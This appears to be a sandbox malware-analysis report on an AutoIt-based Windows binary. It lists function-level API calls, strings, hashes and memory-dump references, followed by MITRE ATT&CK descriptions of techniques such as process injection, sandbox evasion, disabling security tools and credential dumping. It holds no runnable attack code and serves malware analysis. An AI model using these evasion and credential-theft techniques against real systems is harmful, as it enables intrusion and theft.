Opcode Fuzzy Hash: e8622d1798432e065b2f0b7fd00c47c21c75f9bfb38368387bac1ff8246e0e6f
Instruction Fuzzy Hash: 1201F179AA1255ABCB05BBA1CC41CFE33ACEF4A350B800719E873972C2DB31582CCB50

Function 002E2525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 002E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002E4620

SendMessageW.USER32(?,00000180,00000000,?), ref: 002E2593

Strings

ComboBox, xrefs: 002E2532
ListBox, xrefs: 002E255D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: cb00ce325c921620d71253e8f3d319ab427bba43aa251afb3de76e530a750ebd
Instruction ID: 6aa44cebf150b0017c2d800d5e074ae56d480a2d5d1d87f088a0fa821b7f4fde
Opcode Fuzzy Hash: cb00ce325c921620d71253e8f3d319ab427bba43aa251afb3de76e530a750ebd
Instruction Fuzzy Hash: 3401D875AA1145ABCF09FB51C912DFE33ACDF56341FD40019A803672C1DB509A1C8BB1

Function 002E25A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 002E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002E4620

SendMessageW.USER32(?,00000182,?,00000000), ref: 002E2615

Strings

ComboBox, xrefs: 002E25B6
ListBox, xrefs: 002E25E1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9bf03d687c296bd4fe36fd6d6443f120f8b33e1cbbd37496097067c5132960b6
Instruction ID: fab7a22cda64d52b4340bdc840ba69d96ab49d2a0a8d58e43a6eaede3845e930
Opcode Fuzzy Hash: 9bf03d687c296bd4fe36fd6d6443f120f8b33e1cbbd37496097067c5132960b6
Instruction Fuzzy Hash: 3F01A776AA1145A6CB16FB52C942EFE77ACDB16340F940119B803A31C2DB519E2CDAB2

Function 002E26B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028B329: _wcslen.LIBCMT ref: 0028B333

Part of subcall function 002E45FD: GetClassNameW.USER32(?,?,000000FF), ref: 002E4620

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 002E2720

Strings

ComboBox, xrefs: 002E26C2
ListBox, xrefs: 002E26ED

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 533f7d898f0b812c16ad29ea2bd1ffaa9124ffad91bbcd7164ffa94acebea451
Instruction ID: 24a2a21fc8f825d861563219b5e6c45a9b42934afdb84472791cceada107a8e3
Opcode Fuzzy Hash: 533f7d898f0b812c16ad29ea2bd1ffaa9124ffad91bbcd7164ffa94acebea451
Instruction Fuzzy Hash: CBF0F975AA1254A6C706B7A58C42FFE77ACEF06340F800A19F463A32C2DB60581CC660

Function 00319AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 00319B6D

Part of subcall function 00282234: GetWindowLongW.USER32(?,000000EB), ref: 00282242

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00319B53

Strings

(5, xrefs: 00319B06

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LongWindow$MessageProcSend
String ID: (5
API String ID: 982171247-4024434197
Opcode ID: ee8da6e8da979165b2c56c327d3eaf94a2c33f88d1b8914ce49f8f5a8944ba57
Instruction ID: 93a8561aeca0eef17824e6f5f66a805113d5c8ca4f30849c2d44957f5bdcd392
Opcode Fuzzy Hash: ee8da6e8da979165b2c56c327d3eaf94a2c33f88d1b8914ce49f8f5a8944ba57
Instruction Fuzzy Hash: FA01D430209214AFDB2BAF14EC55F963B7AFF8A365F104519F9021A2F0C7726895DB50

Function 002B3A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

Strings

j32, xrefs: 002B3A88
2<+, xrefs: 002B3A64

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID: 2<+$j32
API String ID: 0-831910121
Opcode ID: 5775ebb52d41cbdee24c6e232d4d2e8f71b67bc008f6b5dfc34d5d541a0023e2
Instruction ID: 6dd2f0412c1b98a2cb2046dada854ecb731e1dc135211987109b5666bd6a2d30
Opcode Fuzzy Hash: 5775ebb52d41cbdee24c6e232d4d2e8f71b67bc008f6b5dfc34d5d541a0023e2
Instruction Fuzzy Hash: D1F0B439124149EADB14DF91C850AF973B8DF04740F20416ABDD9CB290FBB49FA0D365

Function 00318432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

GetWindowLongW.USER32(?,000000F0), ref: 00318471
GetWindowLongW.USER32(?,000000EC), ref: 0031847F

Strings

(5, xrefs: 0031843E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: LongWindow
String ID: (5
API String ID: 1378638983-4024434197
Opcode ID: 5ab74eb2e5d919e92bcfa668d976bb728ea17c421a151f75a47caf917a94277d
Instruction ID: e8883b77156569c50d387545b35c74dc28ff71a35ea883b689b6d2162a76ca3e
Opcode Fuzzy Hash: 5ab74eb2e5d919e92bcfa668d976bb728ea17c421a151f75a47caf917a94277d
Instruction Fuzzy Hash: 96F037352012059FC71ADF69DC44DAA77A9FB8A321B218629F926873F0CF309850DB90

Function 002E1461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 002E146F

Strings

AutoIt, xrefs: 002E1463
Error allocating memory., xrefs: 002E1468

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: e41ea91514d07abf89c9b3afb7ff9dd4fafcd98f4ba32c25c41845b3267e2992
Instruction ID: be8b4bf6885982fe86ec417ab222622b9a8e458b8f1f28d6fa3e9742e4a0acbf
Opcode Fuzzy Hash: e41ea91514d07abf89c9b3afb7ff9dd4fafcd98f4ba32c25c41845b3267e2992
Instruction Fuzzy Hash: 6DE0D83139472437D6153794AC03FD576848F0BB61F11482AF74C584C38EE224B056D9

Function 002A10B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0029FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002A10E2,?,?,?,0028100A), ref: 0029FAD9

IsDebuggerPresent.KERNEL32(?,?,?,0028100A), ref: 002A10E6
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0028100A), ref: 002A10F5

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002A10F0

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: b22625b78c2a68da4fab34e640033425272a282da38843bbe5827397a93ebf6f
Instruction ID: ecd5f35a0bdc6052ef216c0c87c7f21e24efbd41d32412be2b3029e4dc137e6f
Opcode Fuzzy Hash: b22625b78c2a68da4fab34e640033425272a282da38843bbe5827397a93ebf6f
Instruction Fuzzy Hash: EEE092746107218FD3719F24E904742BBE8AF05311F008D6DE895D2251DFB8D498CF91

Function 0029F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0029F151

Strings

h55, xrefs: 0029F146
`55, xrefs: 0029F131

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Init_thread_footer
String ID: `55$h55
API String ID: 1385522511-3065681431
Opcode ID: f938b4e45104a52b3eb49c8a43d50b6ff1020fee85e70b928bf31bdf090c9db0
Instruction ID: 970a0700110b5f7c6a55c02d2a009cfd35ca641180ca65903189277bac940629
Opcode Fuzzy Hash: f938b4e45104a52b3eb49c8a43d50b6ff1020fee85e70b928bf31bdf090c9db0
Instruction Fuzzy Hash: 93E026358A4A14CBCE83DB2CEA41D883368FB07332F500574E516C72B1FB202A52CED4

Function 002F39D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 002F39F0
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002F3A05

Strings

aut, xrefs: 002F39F9

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: bf4b6f1490a9127b86f1b0b082d80af2818002d911b8e989123bd955d3d9d92d
Instruction ID: 0da555278a70e6b0d3f34b4fc2448da361e90c225b0fe3ffdab78d49888373db
Opcode Fuzzy Hash: bf4b6f1490a9127b86f1b0b082d80af2818002d911b8e989123bd955d3d9d92d
Instruction Fuzzy Hash: 9BD05E7250032867DA20A7649C0EFCB7B6CDB49710F0006A1BA6596091DBF4EA86CBD0

Function 00312DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00312DC8
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00312DDB

Part of subcall function 002EF292: Sleep.KERNEL32 ref: 002EF30A

Strings

Shell_TrayWnd, xrefs: 00312DC1

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2d53a5b2a358283e52695015b74c71192372ff1e4f536246984d31c9c00f8c43
Instruction ID: a5d882057e3abb07d5f73937902604ecf0aa09cc9fa8e48ad3516e3d4bcedb98
Opcode Fuzzy Hash: 2d53a5b2a358283e52695015b74c71192372ff1e4f536246984d31c9c00f8c43
Instruction Fuzzy Hash: 78D022353D4300BBE268B370AC0FFE2BF589F05B00F908820B70AAA0C0CAE06800CA84

Function 00312DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00312E08
PostMessageW.USER32(00000000), ref: 00312E0F

Part of subcall function 002EF292: Sleep.KERNEL32 ref: 002EF30A

Strings

Shell_TrayWnd, xrefs: 00312E01

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 8f803f012ec7ef3500f0f1f5cc52b96ed895192f9373fcee21da7f9192a0f04b
Instruction ID: 10762790e9a6c3d8460f4ec33e0e4b7897e67b0f4189e321e1c85d530296bb9d
Opcode Fuzzy Hash: 8f803f012ec7ef3500f0f1f5cc52b96ed895192f9373fcee21da7f9192a0f04b
Instruction Fuzzy Hash: C1D022313C13007BF269B370AC0FFD2BB589B0AB00F908820B706AA0C0CAE07800CA88

Function 002BC17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 002BC213
GetLastError.KERNEL32 ref: 002BC221
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 002BC27C

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 0ac06b3eacce0a10504530587f725bf2369568013e9db49b9a5941a652ce25a4
Instruction ID: 6ba83bb771d61c7642b1b97910095627da635a2b489c8bc6135e5b22a16cfad5
Opcode Fuzzy Hash: 0ac06b3eacce0a10504530587f725bf2369568013e9db49b9a5941a652ce25a4
Instruction Fuzzy Hash: 9241E930620207EFDB219FE5C844AEA7BA9EF56790F344169FC59971A1DB708D21CB60

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

